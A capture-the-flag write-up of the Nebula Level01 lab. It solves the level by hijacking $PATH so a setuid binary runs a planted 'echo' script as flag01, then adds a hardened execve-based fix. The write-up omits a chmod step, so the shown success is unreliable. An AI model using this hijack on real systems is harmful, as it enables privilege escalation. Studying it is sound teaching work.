Nebula Level01

Level01

Task

There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with password level01. Files for this level can be found in /home/flag01.


Source code


(level1.c)
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

/* setresgid/setresuid are GNU extensions; glibc declares them only with _GNU_SOURCE */

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  /* binary is setuid flag01: effective ids belong to flag01 */
  gid = getegid();
  uid = geteuid();

  /* make the real and saved ids match the effective ones */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* "echo" is not an absolute path: env resolves it through the caller's $PATH */
  system("/usr/bin/env echo and now what?");
  return 0;
}
Solution

We log in to the machine:

ssh level01@192.168.195.5 

From the task description, the files are in flag01's home directory:

level01@nebula:~$ cd /home/flag01 
level01@nebula:/home/flag01$ ls   
flag01                            
level01@nebula:/home/flag01$      

Reading the source code, we see a call to system() that runs echo through /usr/bin/env, and env resolves "echo" using the $PATH inherited from our shell. This means we can create our own "echo" program and put its directory at the front of $PATH; when we then execute the setuid flag01 binary, our echo is the one found first and runs with the privileges of flag01, the file's owner.

First, we create a file named "echo" in our home directory:

level01@nebula:/home/flag01$ cd ~                   
level01@nebula:~$                                   
level01@nebula:~$ echo "getflag" > echo             

Then we place our home directory, which contains "echo", at the beginning of the $PATH environment variable:

level01@nebula:~$                                   
level01@nebula:~$ export PATH=/home/level01:$PATH   
level01@nebula:~$                                   

Executing the setuid flag01 binary now runs our "echo", and therefore getflag, as the flag01 account:

level01@nebula:~$ /home/flag01/flag01               
level01@nebula:~$ You have successfully executed getflag on target account
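The root cause is the combination of a relative command name and an untrusted inherited environment inside a setuid program. The following hardened version is an added example written for this write-up, not code from the Nebula level or its authors: it keeps the same privilege setup but runs /bin/echo by absolute path through execve() with a fixed environment, so neither $PATH nor a shell is involved. The path_is_trusted() helper and its allowlist of directories are assumptions made for the example.

```c
/*
 * Hardened counterpart to level01 (added example, not the level's code).
 * Fixes the two weaknesses the write-up exploits:
 *   1. "echo" was resolved via the caller-controlled $PATH   -> absolute path
 *   2. the caller's environment was inherited by system()    -> fixed envp, no shell
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* glibc declares these only under _GNU_SOURCE; declare them explicitly here */
int setresuid(uid_t ruid, uid_t euid, uid_t suid);
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);

/* Directories a privileged program may resolve commands from.
 * This allowlist is an assumption for the example; pin it per system. */
static const char *const trusted_dirs[] = {
    "/usr/local/bin", "/usr/bin", "/bin", "/usr/sbin", "/sbin", NULL
};

/* Return 1 if every component of a PATH string is in trusted_dirs, else 0.
 * An empty component (leading/trailing ':' or '::') means the current
 * directory and is rejected as well. */
int path_is_trusted(const char *path)
{
    if (path == NULL || *path == '\0')
        return 0;
    const char *p = path;
    for (;;) {
        const char *end = strchr(p, ':');
        size_t len = end ? (size_t)(end - p) : strlen(p);
        if (len == 0)
            return 0; /* empty component = current directory */
        int found = 0;
        for (int i = 0; trusted_dirs[i] != NULL; i++)
            if (strlen(trusted_dirs[i]) == len && strncmp(p, trusted_dirs[i], len) == 0)
                found = 1;
        if (!found)
            return 0; /* e.g. /home/level01 */
        if (end == NULL)
            return 1;
        p = end + 1;
    }
}

/* Run /bin/echo with a fixed, minimal environment and no shell.
 * Returns the child's exit status (0 on success) or -1 on fork/exec failure. */
int run_echo_hardened(const char *message)
{
    char *const envp[] = { "PATH=/usr/bin:/bin", NULL };       /* nothing inherited */
    char *const argv[] = { "/bin/echo", (char *)message, NULL };

    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        execve("/bin/echo", argv, envp);                        /* absolute path */
        _exit(127);                                              /* only if execve failed */
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    gid_t gid = getegid();
    uid_t uid = geteuid();
    /* same privilege handling as the level's program, but the results are checked */
    if (setresgid(gid, gid, gid) != 0 || setresuid(uid, uid, uid) != 0)
        return 1;

    const char *path = getenv("PATH");
    printf("inherited PATH %s\n",
           (path != NULL && path_is_trusted(path)) ? "looks trusted" : "is NOT trusted (ignored anyway)");
    return run_echo_hardened("and now what?");
}
```

With the write-up's PATH of /home/level01:/usr/bin:/bin, path_is_trusted() returns 0, but the outcome no longer depends on it: the child process receives only the fixed envp and /bin/echo is named explicitly, so a user-supplied "echo" earlier in the caller's PATH is never consulted.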
